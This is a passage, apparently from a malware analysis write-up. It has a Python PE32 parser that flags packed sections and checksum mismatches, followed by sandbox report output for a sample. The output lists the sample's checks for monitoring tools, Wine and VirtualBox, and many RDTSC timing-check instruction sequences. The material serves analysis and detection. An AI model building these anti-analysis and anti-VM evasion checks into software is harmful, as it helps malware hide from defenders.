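SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000  # IMAGE_SCN_MEM_* (winnt.h)
OPT_HDR_SIZE = 224  # PE32 optional header; CheckSum lives at offset 64 inside it


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: near 0 for constant data, near 8.0 for compressed or encrypted data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Recompute the header CheckSum as imagehlp!CheckSumMappedFile does: sum every 32-bit
    word except the CheckSum field, fold carries down to 16 bits, add the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def parse_pe(data: bytes) -> dict:
    """DOS header -> PE signature -> COFF header -> optional header -> section table (PE32 only)."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt_off = pe_off + 24
    if struct.unpack_from("<H", data, opt_off)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry_rva = struct.unpack_from("<I", data, opt_off + 16)[0]
    stored = struct.unpack_from("<I", data, opt_off + 64)[0]
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt_off + opt_size + 40 * i)
        name = name.rstrip(b"\0")
        printable = bool(name) and all(0x20 < b < 0x7F for b in name)  # flags blank / control-char names
        sections.append({
            "name": name.decode("ascii") if printable else "<hex:%s>" % name.hex(),
            "printable_name": printable, "va": va, "vsize": vsize,
            "rights": "".join(f for f, bit in (("E", SCN_EXECUTE), ("R", SCN_READ), ("W", SCN_WRITE)) if chars & bit),
            "entropy": round(shannon_entropy(data[rawptr:rawptr + rawsize]), 3)})
    entry_section = next((s["name"] for s in sections if s["va"] <= entry_rva < s["va"] + s["vsize"]), None)
    expected = pe_checksum(data, opt_off + 64)
    return {"sections": sections, "entry_rva": entry_rva, "entry_section": entry_section,
            "checksum_stored": stored, "checksum_expected": expected, "checksum_ok": stored == expected}


def rights_changed(on_disk: dict, in_memory: dict) -> list:
    """Sections whose E/R/W flags differ between the file and a dump of the running image."""
    return [(a["name"], a["rights"], b["rights"]) for a, b in zip(on_disk["sections"], in_memory["sections"])
            if a["rights"] != b["rights"]]


def build_pe32(sections, entry_rva: int, checksum: int) -> bytes:
    """Constructed minimal PE32 for the demo (not the analysed sample). sections: (name, rva, flags, raw)."""
    file_align = 0x200
    raw_ptr = -(-(0x40 + 4 + 20 + OPT_HDR_SIZE + 40 * len(sections)) // file_align) * file_align
    table, body = bytearray(), bytearray()
    for name, va, chars, raw in sections:
        rawsize = -(-len(raw) // file_align) * file_align
        table += struct.pack("<8sIIIIIIHHI", name, len(raw), va, rawsize, raw_ptr + len(body), 0, 0, 0, 0, chars)
        body += raw.ljust(rawsize, b"\0")
    dos = bytearray(b"MZ".ljust(0x40, b"\0"))
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, OPT_HDR_SIZE, 0x102)
    opt = bytearray(OPT_HDR_SIZE)
    struct.pack_into("<H", opt, 0, 0x10B)                         # PE32 magic
    for off, val in ((16, entry_rva), (28, 0x400000), (32, 0x1000), (36, file_align), (60, raw_ptr), (64, checksum)):
        struct.pack_into("<I", opt, off, val)                     # entry, image base, alignments, headers, CheckSum
    return bytes((dos + b"PE\0\0" + coff + opt + table).ljust(raw_ptr, b"\0") + body)


def demo_images():
    """Constructed 'disk' image (packed first section, E+R) and a 'dump' of it after an unpacker made
    that section writable. Section contents and the 0x1234 checksum are invented for the demo."""
    packed = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))  # 4 KiB, high entropy
    stub = b"\x55\x8b\xec" * 100 + b"\xc3"                                      # repetitive, low entropy
    rest = [(b"hzyqibdm", 0x3000, SCN_EXECUTE | SCN_READ | SCN_WRITE, stub),
            (b".taggant", 0x4000, SCN_EXECUTE | SCN_READ | SCN_WRITE, stub)]
    disk = build_pe32([(b"\x01\x02\x03", 0x1000, SCN_EXECUTE | SCN_READ, packed)] + rest, 0x4010, 0x1234)
    dump = build_pe32([(b"\x01\x02\x03", 0x1000, SCN_EXECUTE | SCN_READ | SCN_WRITE, packed)] + rest, 0x4010, 0x1234)
    return disk, dump


if __name__ == "__main__":
    disk, dump = demo_images()
    report = parse_pe(disk)
    for s in report["sections"]:
        print("%-16s va=%#07x rights=%-3s entropy=%.3f" % (s["name"], s["va"], s["rights"], s["entropy"]))
    print("entry point in:", report["entry_section"], "| checksum ok:", report["checksum_ok"])
    print("rights changed on unpack:", rights_changed(report, parse_pe(dump)))
```

On the constructed image the script reports the first section as `<hex:010203>` with entropy above 7.9, the entry point in `.taggant`, a CheckSum mismatch, and that section's rights changing from ER to ERW between disk and dump. The same functions work on a real file and a process dump; only PE32 is decoded, and the CheckSum routine assumes the field is 4-byte aligned, which holds for every linker-produced header.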

                Boot Survival

Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - Window searched: window name: Filemonclass
(these are the window class names of Sysinternals Filemon, Process Monitor and Regmon; the lookups recur several times in the listing, with the Filemon and Regmon class names tried in both capitalisations)
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
(crypt32 registers a change notification on the AuthRoot keys whenever a process opens the system certificate store, so these two entries are expected from any process that uses TLS and are not by themselves a persistence indicator)
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe - Process information set: NOOPENFILEERRORBOX
(both WerFault.exe entries recur many times in the listing; the flags are SetErrorMode values that suppress error dialogs)

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - System information queried: FirmwareTableInformation (the SMBIOS/ACPI tables returned this way carry the hypervisor vendor strings on a VM)
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - File opened: HKEY_CURRENT_USER\Software\Wine (present only under Wine)
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (present only on a VirtualBox guest)
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 4086F9 second address: 408710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 408009 second address: 40800E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58AB29 second address: 58AB2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 589B47 second address: 589B6C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC69CE9FC5Ch 0x00000012 jmp 00007FC69CE9FC5Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 589B6C second address: 589B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FC69CB9B4ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 589B7A second address: 589B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 589E46 second address: 589E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 589E4C second address: 589E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 589E50 second address: 589EAE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC69CB9B4A6h 0x00000008 jmp 00007FC69CB9B4B8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 pushad 0x00000011 jmp 00007FC69CB9B4ADh 0x00000016 jnc 00007FC69CB9B4BAh 0x0000001c push eax 0x0000001d push edx 0x0000001e jns 00007FC69CB9B4A6h 0x00000024 jmp 00007FC69CB9B4ABh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58A435 second address: 58A43F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D304 second address: 58D309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D309 second address: 58D376 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jns 00007FC69CE9FC57h 0x00000012 movzx ecx, cx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FC69CE9FC58h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 call 00007FC69CE9FC59h 0x00000036 jns 00007FC69CE9FC64h 0x0000003c push eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 jo 00007FC69CE9FC56h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D376 second address: 58D3B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC69CB9B4B6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D3B0 second address: 58D3B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D3B4 second address: 58D3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D3BA second address: 58D3BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D3BF second address: 58D3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edi 0x0000000c jmp 00007FC69CB9B4ABh 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 js 00007FC69CB9B4B0h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D49D second address: 58D4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D4E0 second address: 58D4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D4E4 second address: 58D56B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f nop 0x00000010 jmp 00007FC69CE9FC5Eh 0x00000015 push 00000000h 0x00000017 mov ecx, dword ptr [ebp+122D2CF9h] 0x0000001d push 2DC97680h 0x00000022 jmp 00007FC69CE9FC5Ch 0x00000027 xor dword ptr [esp], 2DC97600h 0x0000002e mov esi, ebx 0x00000030 sbb di, 30DEh 0x00000035 push 00000003h 0x00000037 clc 0x00000038 push 00000000h 0x0000003a call 00007FC69CE9FC5Fh 0x0000003f mov edi, dword ptr [ebp+122D1E36h] 0x00000045 pop edi 0x00000046 push 00000003h 0x00000048 jmp 00007FC69CE9FC66h 0x0000004d call 00007FC69CE9FC59h 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D56B second address: 58D571 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D571 second address: 58D578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D578 second address: 58D589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007FC69CB9B4AEh 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D589 second address: 58D5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jng 00007FC69CE9FC5Eh 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007FC69CE9FC64h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push esi 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D5BE second address: 58D608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop eax 0x00000007 xor dword ptr [ebp+122D37A5h], edi 0x0000000d lea ebx, dword ptr [ebp+1245917Eh] 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FC69CB9B4A8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov ecx, dword ptr [ebp+122D2EE1h] 0x00000033 xchg eax, ebx 0x00000034 pushad 0x00000035 jmp 00007FC69CB9B4ABh 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D608 second address: 58D60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D60C second address: 58D610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 58D71A second address: 58D7E0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC69CE9FC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 6B3817D1h 0x00000011 mov si, C5FBh 0x00000015 push 00000003h 0x00000017 movzx edi, cx 0x0000001a jmp 00007FC69CE9FC65h 0x0000001f push 00000000h 0x00000021 mov di, EC5Bh 0x00000025 push 00000003h 0x00000027 push 749AA7A5h 0x0000002c push ecx 0x0000002d jmp 00007FC69CE9FC64h 0x00000032 pop ecx 0x00000033 add dword ptr [esp], 4B65585Bh 0x0000003a jp 00007FC69CE9FC5Ch 0x00000040 lea ebx, dword ptr [ebp+12459189h] 0x00000046 push 00000000h 0x00000048 push ecx 0x00000049 call 00007FC69CE9FC58h 0x0000004e pop ecx 0x0000004f mov dword ptr [esp+04h], ecx 0x00000053 add dword ptr [esp+04h], 0000001Ch 0x0000005b inc ecx 0x0000005c push ecx 0x0000005d ret 0x0000005e pop ecx 0x0000005f ret 0x00000060 jmp 00007FC69CE9FC62h 0x00000065 jng 00007FC69CE9FC56h 0x0000006b push eax 0x0000006c jo 00007FC69CE9FC7Bh 0x00000072 push eax 0x00000073 push edx 0x00000074 jo 00007FC69CE9FC56h 0x0000007a rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5AC8A5 second address: 5AC8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CB9B4B7h 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC69CB9B4B9h 0x00000014 jg 00007FC69CB9B4A6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5AC8E5 second address: 5AC8FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC63h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5AC8FC second address: 5AC90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC69CB9B4ACh 0x0000000c jnp 00007FC69CB9B4A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5AC90E second address: 5AC914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5AC914 second address: 5AC918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5ACA41 second address: 5ACA47 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5ACA47 second address: 5ACA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5ACA50 second address: 5ACA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC69CE9FC56h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5ACA5B second address: 5ACA7C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC69CB9B4ACh 0x00000008 jne 00007FC69CB9B4A8h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jnp 00007FC69CB9B4B0h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5ACC01 second address: 5ACC22 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC69CE9FC63h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FC69CE9FC6Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5ACD5E second address: 5ACD7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FC69CB9B4A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5ACD7E second address: 5ACD9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC69CE9FC67h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 583865 second address: 583898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FC69CB9B4B4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 583898 second address: 58389C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5AD0AA second address: 5AD0B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5AD393 second address: 5AD39C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5AD608 second address: 5AD61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FC69CB9B4A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5AD61B second address: 5AD61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5AD8C1 second address: 5AD8F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B1h 0x00000007 jmp 00007FC69CB9B4B4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jne 00007FC69CB9B4A8h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5AD8F6 second address: 5AD8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 56DB56 second address: 56DB5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 56DB5E second address: 56DB6E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edi 0x00000008 js 00007FC69CE9FC5Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 56DB6E second address: 56DB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FC69CB9B4AEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5AE3FB second address: 5AE402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5B2ABC second address: 5B2AC6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC69CB9B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5B2FE2 second address: 5B2FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5B20D3 second address: 5B20D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5B20D7 second address: 5B20DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5B20DD second address: 5B20E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5B20E1 second address: 5B20F8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FC69CE9FC58h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5B3345 second address: 5B3353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4AAh 0x00000009 rdtsc
